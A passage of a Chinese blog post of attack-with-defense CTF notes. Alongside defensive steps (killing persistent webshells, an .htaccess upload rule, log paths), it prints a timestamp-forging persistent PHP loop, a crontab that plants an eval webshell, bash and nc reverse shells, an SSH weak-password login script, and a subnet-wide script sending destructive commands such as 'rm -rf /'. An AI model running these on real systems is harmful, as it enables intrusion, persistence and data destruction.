&#xA0; echo &quot;kill?&quot;</span><br><span class="line">&#xA0; &#xA0; fi</span><br><span class="line">done</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<ol>
<li>&#x5728;&#x7B2C; 5 &#x884C;&#x548C;&#x7B2C; 9 &#x884C;&#x7684;&#xA0;if&#xA0;&#x8BED;&#x53E5;&#x4E2D;&#xFF0C;&#x5E94;&#x8BE5;&#x5728;&#xA0;[&#xA0;&#x548C;&#xA0;]&#xA0;&#x4E4B;&#x95F4;&#x6DFB;&#x52A0;&#x7A7A;&#x683C;&#xFF0C;&#x5426;&#x5219;&#x4F1A;&#x5BFC;&#x81F4;&#x8BED;&#x6CD5;&#x9519;&#x8BEF;&#x3002;</li>
<li>&#x5728;&#x7B2C; 7 &#x884C;&#x7684;&#xA0;if&#xA0;&#x8BED;&#x53E5;&#x4E2D;&#xFF0C;[! -z &#x201C;ps aux | grep shell0812.php&#x201D;]&#xA0;&#x4E2D;&#x7684;&#x7A7A;&#x683C;&#x4F4D;&#x7F6E;&#x6709;&#x8BEF;&#xFF0C;&#x5E94;&#x8BE5;&#x4E3A;&#xA0;[ ! -z &#x201C;$(ps aux | grep shell0812.php)&#x201D; ]&#x3002;&#x8BE5;&#x547D;&#x4EE4;&#x4F7F;&#x7528;&#xA0;$()&#xA0;&#x5C06;&#xA0;ps aux | grep shell0812.php&#xA0;&#x7684;&#x8F93;&#x51FA;&#x4F5C;&#x4E3A;&#x53C2;&#x6570;&#x4F20;&#x9012;&#x7ED9;&#xA0;-z&#xA0;&#x9009;&#x9879;&#x8FDB;&#x884C;&#x5224;&#x65AD;&#x3002;</li>
<li>&#x5728;&#x7B2C; 10 &#x884C;&#x7684;&#xA0;if&#xA0;&#x8BED;&#x53E5;&#x4E2D;&#xFF0C;&#x5E94;&#x8BE5;&#x4F7F;&#x7528;&#xA0;grep -q&#xA0;&#x547D;&#x4EE4;&#x6765;&#x68C0;&#x67E5;&#x8FDB;&#x7A0B;&#x662F;&#x5426;&#x5B58;&#x5728;&#xFF0C;&#x5E76;&#x4E14;&#x4F7F;&#x7528;&#x6B63;&#x5219;&#x8868;&#x8FBE;&#x5F0F;&#xA0;[s]hell0812.php&#xA0;&#x6765;&#x907F;&#x514D;&#x5728;&#xA0;grep&#xA0;&#x547D;&#x4EE4;&#x8F93;&#x51FA;&#x4E2D;&#x5339;&#x914D;&#x5230;&#x81EA;&#x8EAB;&#x8FDB;&#x7A0B;&#xFF0C;&#x4ECE;&#x800C;&#x8BEF;&#x5224;&#x8FDB;&#x7A0B;&#x662F;&#x5426;&#x5B58;&#x5728;&#x3002;</li>
<li>&#x6539;&#x8FC7;&#x4EE5;&#x540E;&#x7684;&#xFF0C;&#x6709;&#x70B9;&#x5F31;&#x667A;&#x4F46;&#x662F;&#x52C9;&#x5F3A;&#x80FD;&#x7528;</li>
</ol>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">while true;</span><br><span class="line">do</span><br><span class="line">&#xA0; &#xA0; if [ -f ./shell0812.php ]; then</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; rm -f ./shell0812.php</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; echo &quot;delete?&quot;</span><br><span class="line">&#xA0; &#xA0; fi</span><br><span class="line">&#xA0; &#xA0; if [ ! -z &quot;$(ps aux | grep shell0812.php)&quot; ]; then</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; pkill -f shell0812.php</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; echo &quot;kill?&quot;</span><br><span class="line">&#xA0; &#xA0; fi</span><br><span class="line">done</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h4 id="&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;">
          <a href="#&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;" class="headerlink" title="&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;"></a>&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;</h4>
      <blockquote>
</blockquote>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">grep -v grep</span><br><span class="line">&#x5728;&#x8FDB;&#x7A0B;&#x4FE1;&#x606F;&#x4E2D;&#x5254;&#x9664;&#x5E26;grep&#x7684;&#x4FE1;&#x606F;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<blockquote>
</blockquote>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps aux | grep www-data | grep -v grep | awk &apos;{print $2}&apos; | xargs kill -9</span><br></pre></td></tr></table></div></figure>


        <h4 id="&#x6761;&#x4EF6;&#x7ADE;&#x4E89;&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;">
          <a href="#&#x6761;&#x4EF6;&#x7ADE;&#x4E89;&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6761;&#x4EF6;&#x7ADE;&#x4E89;&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;" class="headerlink" title="&#x6761;&#x4EF6;&#x7ADE;&#x4E89;&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;"></a>&#x6761;&#x4EF6;&#x7ADE;&#x4E89;&#x6740;&#x6B7B;&#x4E0D;&#x6B7B;&#x9A6C;</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">while (1) {</span><br><span class="line">    $pid=1234;  #&#x4E0D;&#x6B7B;&#x9A6C;&#x8FDB;&#x7A0B;</span><br><span class="line">    @unlink(&apos;demo.php&apos;); #&#x4E0D;&#x6B7B;&#x9A6C;&#x540D;&#x79F0;</span><br><span class="line">    exec(&apos;kill -9 $pid&apos;);</span><br><span class="line">}</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">    ignore_user_abort(true);</span><br><span class="line">    set_time_limit(0);</span><br><span class="line">    unlink(__FILE__);</span><br><span class="line">    $file = &apos;.3.php&apos;;</span><br><span class="line">    $code = &apos;hi springbird !&apos;;</span><br><span class="line">    //pass=pass</span><br><span class="line">    while (1){</span><br><span class="line">        file_put_contents($file,$code);</span><br><span class="line">        system(&apos;touch -m -d &quot;2018-12-01 09:10:12&quot; .3.php&apos;);</span><br><span class="line">    //    usleep(5000);</span><br><span class="line">          usleep(1000);</span><br><span class="line">    }</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></div></figure>






        <h4 id="&#x6E05;&#x9664;&#x53CD;&#x5F39;shell">
          <a href="#&#x6E05;&#x9664;&#x53CD;&#x5F39;shell" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6E05;&#x9664;&#x53CD;&#x5F39;shell" class="headerlink" title="&#x6E05;&#x9664;&#x53CD;&#x5F39;shell"></a>&#x6E05;&#x9664;&#x53CD;&#x5F39;shell</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ps -ef / px -aux</span><br><span class="line"></span><br><span class="line">kill `ps -aux | grep www-data | grep apache2 | awk &apos;{print $2}&apos;`</span><br></pre></td></tr></table></div></figure>




        <h3 id="&#x5B9A;&#x65F6;&#x4EFB;&#x52A1;">
          <a href="#&#x5B9A;&#x65F6;&#x4EFB;&#x52A1;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x5B9A;&#x65F6;&#x4EFB;&#x52A1;" class="headerlink" title="&#x5B9A;&#x65F6;&#x4EFB;&#x52A1;"></a>&#x5B9A;&#x65F6;&#x4EFB;&#x52A1;</h3>
      
        <h4 id="crontab">
          <a href="#crontab" class="heading-link"><i class="fas fa-link"></i></a><a href="#crontab" class="headerlink" title="crontab"></a>crontab</h4>
      <blockquote>
<p>&#x5728; PHP &#x4EE3;&#x7801;&#x5B57;&#x7B26;&#x4E32;&#x4E2D;&#xFF0C;\\\\\ &#x88AB;&#x7528;&#x6765;&#x8F6C;&#x4E49;&#x53CD;&#x659C;&#x7EBF;&#x5B57;&#x7B26;&#xFF0C;&#x4EE5;&#x4FBF;&#x53EF;&#x4EE5;&#x5728; PHP &#x4EE3;&#x7801;&#x4E2D;&#x6B63;&#x786E;&#x8BBF;&#x95EE; $_POST &#x6570;&#x7EC4;&#x53CA;&#x5176;&#x503C;&#x3002;</p>
</blockquote>
<blockquote>
<ul>
<li><ul>
<li><ul>
<li><ul>
<li><ul>
<li>&#x662F; cron job &#x8BED;&#x6CD5;&#xFF0C;&#x7528;&#x4E8E;&#x6307;&#x5B9A;&#x547D;&#x4EE4;&#x5E94;&#x8BE5;&#x6267;&#x884C;&#x7684;&#x65F6;&#x95F4;&#x548C;&#x9891;&#x7387;&#x3002;&#x5B83;&#x7531;&#x4E94;&#x4E2A;&#x7531;&#x7A7A;&#x683C;&#x5206;&#x9694;&#x7684;&#x5B57;&#x6BB5;&#x7EC4;&#x6210;&#xFF0C;&#x6BCF;&#x4E2A;&#x5B57;&#x6BB5;&#x4EE3;&#x8868;&#x4E00;&#x4E2A;&#x7279;&#x5B9A;&#x7684;&#x65F6;&#x95F4;&#x6BB5;&#x3002;&#x8FD9;&#x4E9B;&#x5B57;&#x6BB5;&#x4F9D;&#x6B21;&#x8868;&#x793A;&#x5206;&#x949F;&#xFF08;0-59&#xFF09;&#x3001;&#x5C0F;&#x65F6;&#xFF08;0-23&#xFF09;&#x3001;&#x6708;&#x4EFD;&#x4E2D;&#x7684;&#x65E5;&#x671F;&#xFF08;1-31&#xFF09;&#x3001;&#x6708;&#x4EFD;&#xFF08;1-12&#xFF09;&#x548C;&#x661F;&#x671F;&#x4E2D;&#x7684;&#x65E5;&#x671F;&#xFF08;0-6&#xFF0C;&#x5176;&#x4E2D; 0 &#x8868;&#x793A;&#x661F;&#x671F;&#x65E5;&#xFF09;&#x3002;&#x5728;&#x8FD9;&#x4E2A;&#x4F8B;&#x5B50;&#x4E2D;&#xFF0C;* * * * * &#x8868;&#x793A;&#x8BE5;&#x547D;&#x4EE4;&#x5C06;&#x6BCF;&#x5206;&#x949F;&#x3001;&#x6BCF;&#x5C0F;&#x65F6;&#x3001;&#x6BCF;&#x6708;&#x7684;&#x6BCF;&#x4E00;&#x5929;&#x3001;&#x6BCF;&#x5E74;&#x7684;&#x6BCF;&#x4E2A;&#x6708;&#x3001;&#x4EE5;&#x53CA;&#x6BCF;&#x5468;&#x7684;&#x6BCF;&#x4E00;&#x5929;&#x90FD;&#x4F1A;&#x88AB;&#x6267;&#x884C;&#x3002;</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</blockquote>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system(&apos;echo &quot;* * * * * echo \&quot;&lt;?php  if(md5(\\\\\\\\\$_POST[pass])==\&apos;59c6d6bd057da74deecf068e3f6cc19d\&apos;){@eval(\\\\\\\\\$_POST[1]);}  \&quot; &gt; /var/www/html/.index.php\n* * * * * chmod 777 /var/www/html/.index.php&quot; | crontab;whoami&apos;);</span><br></pre></td></tr></table></div></figure>




        <h3 id="&#x53CD;&#x5F39;shell">
          <a href="#&#x53CD;&#x5F39;shell" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x53CD;&#x5F39;shell" class="headerlink" title="&#x53CD;&#x5F39;shell"></a>&#x53CD;&#x5F39;shell</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bash -c bash&apos;bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1&apos;</span><br><span class="line"></span><br><span class="line">nc -e /bin/bash IP PORT bash</span><br></pre></td></tr></table></div></figure>



<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.182.130/6666 0&gt;&amp;1</span><br></pre></td></tr></table></div></figure>


        <h2 id="&#x8F6F;&#x94FE;&#x63A5;">
          <a href="#&#x8F6F;&#x94FE;&#x63A5;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x8F6F;&#x94FE;&#x63A5;" class="headerlink" title="&#x8F6F;&#x94FE;&#x63A5;"></a>&#x8F6F;&#x94FE;&#x63A5;</h2>
      <p>&#x4F2A;&#x9020;flag&#xFF1F;&#xFF08;&#x4E0D;&#x662F;&#x3002;&#x3002;&#x3002;&#x662F;&#x4E3A;&#x4E86;&#x8BFB;flag&#xFF0C;&#x76F4;&#x63A5;&#x8BBF;&#x95EE;&#x4E0D;&#x884C;&#x7684;&#x8BDD;&#xFF0C;&#x5C31;&#x8BBF;&#x95EE;&#x8F6F;&#x94FE;&#x63A5;&#xFF09;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ln -s /var/www/html/flag /var/www/html/cs/flag.css</span><br></pre></td></tr></table></div></figure>

<p>f.txt</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag{f.php}</span><br></pre></td></tr></table></div></figure>

<p>&#x4E0B;&#x9762;&#x8FD9;&#x4E2A;&#x662F;&#x5728;a.txt&#x91CC;&#x9762;&#x5B58;&#x5165;&#x4E86;f.txt&#x7684;&#x8F6F;&#x94FE;&#x63A5;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ln -s ./f.txt ./a.txt</span><br></pre></td></tr></table></div></figure>

<blockquote>
<p>&#x5047;&#x8BBE;&#x6211;&#x7528;team&#x7528;&#x6237;&#x5EFA;&#x7ACB;&#x4E86;&#x4E00;&#x4E2A;&#x8F6F;&#x94FE;&#x63A5;&#x6587;&#x4EF6;a.txt,&#x8FD9;&#x4E2A;&#x8F6F;&#x94FE;&#x63A5;&#x6307;&#x5411;&#x53EA;&#x80FD;&#x7531;root&#x7528;&#x6237;&#x8BFB;&#x53D6;&#x7684;f.txt&#x6587;&#x4EF6;&#xFF0C;&#x8BBF;&#x95EE;a.txt&#xFF0C;&#x6211;&#x80FD;&#x8BFB;&#x53D6;&#x5230;f.txt&#x7684;&#x5185;&#x5BB9;&#x5417;</p>
</blockquote>

        <h3 id="ssh&#x5F31;&#x5BC6;&#x7801;&#x5229;&#x7528;">
          <a href="#ssh&#x5F31;&#x5BC6;&#x7801;&#x5229;&#x7528;" class="heading-link"><i class="fas fa-link"></i></a><a href="#ssh&#x5F31;&#x5BC6;&#x7801;&#x5229;&#x7528;" class="headerlink" title="ssh&#x5F31;&#x5BC6;&#x7801;&#x5229;&#x7528;"></a>ssh&#x5F31;&#x5BC6;&#x7801;&#x5229;&#x7528;</h3>
      <p>&#x867D;&#x7136;&#x77E5;&#x9053;&#x6CA1;&#x5565;&#x7528;&#xFF0C;&#x4F46;&#x662F;&#x8FD8;&#x662F;&#x5148;&#x5B58;&#x4E00;&#x4E2A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">#-*- coding:utf-8 -*-</span><br><span class="line">import paramiko</span><br><span class="line">ip = &apos;192.168.1.137&apos;</span><br><span class="line">port = &apos;22&apos;</span><br><span class="line">username = &apos;root&apos;</span><br><span class="line">passwd = &apos;123456&apos;</span><br><span class="line"># ssh &#x7528;&#x6237;&#x540D; &#x5BC6;&#x7801; &#x767B;&#x9646;</span><br><span class="line">def ssh_base_pwd(ip,port,username,passwd,cmd=&apos;cat /flag&apos;):</span><br><span class="line">    port = int(port)</span><br><span class="line">    ssh = paramiko.SSHClient()</span><br><span class="line">    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())</span><br><span class="line">    ssh.connect(hostname=ip, port=port, username=username, password=passwd)</span><br><span class="line">    stdin,stdout,stderr = ssh.exec_command(cmd)</span><br><span class="line">    result = stdout.read()</span><br><span class="line">    if not result :</span><br><span class="line">        print(&quot;&#x65E0;&#x7ED3;&#x679C;!&quot;)</span><br><span class="line">        result = stderr.read()</span><br><span class="line">    ssh.close()</span><br><span class="line">    return result.decode()</span><br><span class="line">a = ssh_base_pwd(ip,port,username,passwd)</span><br><span class="line">print(a)</span><br><span class="line"></span><br><span class="line">#SL{3c7c719b9fb980dca71080b9d96c9c6aa03c16c0}</span><br></pre></td></tr></table></div></figure>


        <h3 id="alias&#x8D77;&#x522B;&#x540D;">
          <a href="#alias&#x8D77;&#x522B;&#x540D;" class="heading-link"><i class="fas fa-link"></i></a><a href="#alias&#x8D77;&#x522B;&#x540D;" class="headerlink" title="alias&#x8D77;&#x522B;&#x540D;"></a>alias&#x8D77;&#x522B;&#x540D;</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">alias cat=&quot;echo nothing&quot;</span><br><span class="line"></span><br><span class="line">unalias -a</span><br></pre></td></tr></table></div></figure>


        <h3 id="&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;">
          <a href="#&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;" class="headerlink" title="&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;"></a>&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;</h3>
      <p>&#x57FA;&#x672C;&#x539F;&#x5219;</p>
<ul>
<li>&#x80FD;&#x4FEE;&#x590D;&#x7684;&#x5C3D;&#x91CF;&#x4FEE;&#x590D;&#xFF1B;</li>
<li>&#x4E0D;&#x80FD;&#x4FEE;&#x590D;&#x7684;&#x5148;&#x6CE8;&#x91CA;&#x6E90;&#x7801;&#xFF0C;&#x4E0D;&#x5F71;&#x54CD;&#x9875;&#x9762;&#x663E;&#x793A;&#x518D;&#x5220;&#x9664;&#xFF1B;</li>
<li>&#x7AD9;&#x70B9;&#x548C;&#x5BF9;&#x5E94;&#x7684;&#x529F;&#x80FD;&#x5C3D;&#x53EF;&#x80FD;&#x4E0D;&#x5B95;&#x673A;&#xFF1B;</li>
</ul>
<p>&#x6280;&#x5DE7;</p>
<ul>
<li>&#x8BBE;&#x7F6E; waf&#xFF0C;&#x5982; load_file&#xFF1B;</li>
<li>&#x5BF9;&#x4E8E;&#x4E00;&#x4E9B;&#x6210;&#x578B;&#x7684; CMS&#xFF0C;&#x627E;&#x5230;&#x76F8;&#x5E94;&#x7248;&#x672C;&#x53F7;&#x540E;&#xFF0C;&#x5BF9;&#x5176; diff&#xFF1B;</li>
<li>&#x4FEE;&#x6539;&#x5F31;&#x53E3;&#x4EE4;&#x7528;&#x6237;&#xFF1B;</li>
<li>&#x5BF9;&#x4E8E;&#x89C9;&#x5F97;&#x5371;&#x9669;&#x51FD;&#x6570;&#x7684;&#x5730;&#x65B9;&#x76F4;&#x63A5;&#x4F7F;&#x7528;die()&#xFF1B;</li>
</ul>
<p>&#x6BD4;&#x5982;&#x6587;&#x4EF6;&#x4E0A;&#x4F20;&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;&#xFF0C;&#x53EF;&#x4EE5;&#x5728;upload&#x76EE;&#x5F55;&#x4E0B;&#x5199;.htaccess&#x7981;&#x6B62;php&#x6587;&#x4EF6;&#x6267;&#x884C;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;Directory &quot;/var/www/html/upload&quot;&gt;</span><br><span class="line">Options -ExecCGI -Indexes</span><br><span class="line">AllowOverride None</span><br><span class="line">RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml</span><br><span class="line">RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml</span><br><span class="line">php_flag engine off</span><br><span class="line">&lt;FilesMatch &quot;.+\.ph(p[3457]?|t|tml)$&quot;&gt;</span><br><span class="line">deny from all</span><br><span class="line">&lt;/FilesMatch&gt;</span><br><span class="line">&lt;/Directory&gt;</span><br></pre></td></tr></table></div></figure>


        <h3 id="&#x65E5;&#x5FD7;&#x5206;&#x6790;">
          <a href="#&#x65E5;&#x5FD7;&#x5206;&#x6790;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x65E5;&#x5FD7;&#x5206;&#x6790;" class="headerlink" title="&#x65E5;&#x5FD7;&#x5206;&#x6790;"></a>&#x65E5;&#x5FD7;&#x5206;&#x6790;</h3>
      <p>&#x65E5;&#x5FD7;&#x7684;&#x5B58;&#x653E;&#x5730;&#x5740;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/var/log/apache2/</span><br><span class="line">/usr/local/apache2/logs</span><br><span class="line">/usr/nginx/logs/</span><br></pre></td></tr></table></div></figure>








        <h3 id="&#x6587;&#x4EF6;&#x76D1;&#x63A7;">
          <a href="#&#x6587;&#x4EF6;&#x76D1;&#x63A7;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6587;&#x4EF6;&#x76D1;&#x63A7;" class="headerlink" title="&#x6587;&#x4EF6;&#x76D1;&#x63A7;"></a>&#x6587;&#x4EF6;&#x76D1;&#x63A7;</h3>
      <p>tailf&#xA0;&#x662F; Linux &#x7CFB;&#x7EDF;&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x547D;&#x4EE4;&#xFF0C;&#x5B83;&#x53EF;&#x4EE5;&#x5B9E;&#x65F6;&#x76D1;&#x63A7;&#x6307;&#x5B9A;&#x6587;&#x4EF6;&#x7684;&#x53D8;&#x5316;&#xFF0C;&#x5E76;&#x5C06;&#x65B0;&#x589E;&#x7684;&#x5185;&#x5BB9;&#x8F93;&#x51FA;&#x5230;&#x7EC8;&#x7AEF;&#x3002;tailf&#xA0;&#x547D;&#x4EE4;&#x5728;&#x67D0;&#x4E9B;&#x65B9;&#x9762;&#x7C7B;&#x4F3C;&#x4E8E;&#xA0;tail -f&#xA0;&#x547D;&#x4EE4;&#xFF0C;&#x4F46;&#x662F;&#xA0;tailf&#xA0;&#x547D;&#x4EE4;&#x53EF;&#x4EE5;&#x5904;&#x7406;&#x4E00;&#x4E9B;&#x7279;&#x6B8A;&#x60C5;&#x51B5;&#xFF0C;&#x6BD4;&#x5982;&#x5F53;&#x88AB;&#x76D1;&#x63A7;&#x7684;&#x6587;&#x4EF6;&#x88AB;&#x5220;&#x9664;&#x6216;&#x8005;&#x88AB;&#x8F6E;&#x6362;&#x65F6;&#xFF0C;tailf&#xA0;&#x547D;&#x4EE4;&#x53EF;&#x4EE5;&#x81EA;&#x52A8;&#x91CD;&#x65B0;&#x6253;&#x5F00;&#x6587;&#x4EF6;&#xFF0C;&#x5E76;&#x7EE7;&#x7EED;&#x8F93;&#x51FA;&#x65B0;&#x589E;&#x7684;&#x5185;&#x5BB9;&#x3002;</p>
<p>tailf&#xA0;&#x547D;&#x4EE4;&#x7684;&#x8BED;&#x6CD5;&#x5982;&#x4E0B;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tailf [&#x9009;&#x9879;] &#x6587;&#x4EF6;&#x540D;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x5176;&#x4E2D;&#xFF0C;&#x9009;&#x9879;&#x53EF;&#x4EE5;&#x662F;&#xFF1A;</p>
<ul>
<li>-n &lt;&#x884C;&#x6570;&gt;&#xFF1A;&#x6307;&#x5B9A;&#x8F93;&#x51FA;&#x6587;&#x4EF6;&#x7684;&#x6700;&#x540E;&#x51E0;&#x884C;&#xFF0C;&#x9ED8;&#x8BA4;&#x4E3A; 10 &#x884C;&#x3002;</li>
<li>-s &lt;&#x79D2;&#x6570;&gt;&#xFF1A;&#x6307;&#x5B9A;&#x68C0;&#x67E5;&#x6587;&#x4EF6;&#x53D8;&#x5316;&#x7684;&#x65F6;&#x95F4;&#x95F4;&#x9694;&#xFF0C;&#x9ED8;&#x8BA4;&#x4E3A; 1 &#x79D2;&#x3002;</li>
</ul>
<p>&#x4F7F;&#x7528;&#xA0;tailf&#xA0;&#x547D;&#x4EE4;&#x65F6;&#xFF0C;&#x5B83;&#x4F1A;&#x4E00;&#x76F4;&#x8FD0;&#x884C;&#x5728;&#x7EC8;&#x7AEF;&#x4E0A;&#xFF0C;&#x5B9E;&#x65F6;&#x76D1;&#x63A7;&#x6307;&#x5B9A;&#x7684;&#x6587;&#x4EF6;&#x3002;&#x5F53;&#x6587;&#x4EF6;&#x6709;&#x65B0;&#x7684;&#x5185;&#x5BB9;&#x6DFB;&#x52A0;&#x65F6;&#xFF0C;tailf&#xA0;&#x547D;&#x4EE4;&#x4F1A;&#x5C06;&#x65B0;&#x589E;&#x5185;&#x5BB9;&#x8F93;&#x51FA;&#x5230;&#x7EC8;&#x7AEF;&#xFF0C;&#x76F4;&#x5230;&#x624B;&#x52A8;&#x4E2D;&#x65AD;&#xA0;tailf&#xA0;&#x547D;&#x4EE4;&#x7684;&#x6267;&#x884C;&#xFF0C;&#x6216;&#x8005;&#xA0;tailf&#xA0;&#x547D;&#x4EE4;&#x6240;&#x5728;&#x7684;&#x7EC8;&#x7AEF;&#x88AB;&#x5173;&#x95ED;&#x3002;</p>

        <h3 id="&#x6D41;&#x91CF;&#x5206;&#x6790;">
          <a href="#&#x6D41;&#x91CF;&#x5206;&#x6790;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6D41;&#x91CF;&#x5206;&#x6790;" class="headerlink" title="&#x6D41;&#x91CF;&#x5206;&#x6790;"></a>&#x6D41;&#x91CF;&#x5206;&#x6790;</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">def scan_attack():</span><br><span class="line">    file={&apos;shell.php&apos;,&apos;admin.php&apos;,&apos;web.php&apos;,&apos;login.php&apos;,&apos;1.php&apos;,&apos;index.php&apos;}</span><br><span class="line">    payload={&apos;cat /flag&apos;,&apos;ls -al&apos;,&apos;rm -f&apos;,&apos;echo 1&apos;,&apos;echo 1 /proc/sys/net/ipv4/ip_forward&apos;,&apos;rm -rf / --no-preserve-root&apos;}</span><br><span class="line">    while(1):</span><br><span class="line">        for i in range(1, 50):</span><br><span class="line">            for ii in file:</span><br><span class="line">                url=&apos;http://192.168.182.&apos;+ str(i)+&apos;/&apos;+ii</span><br><span class="line">                print(url)</span><br><span class="line">                for iii in payload:</span><br><span class="line">                    data={</span><br><span class="line">                        &apos;payload&apos;:iii</span><br><span class="line">                    }</span><br><span class="line">                    try:</span><br><span class="line">                        requests.post(url,data=data)</span><br><span class="line">                        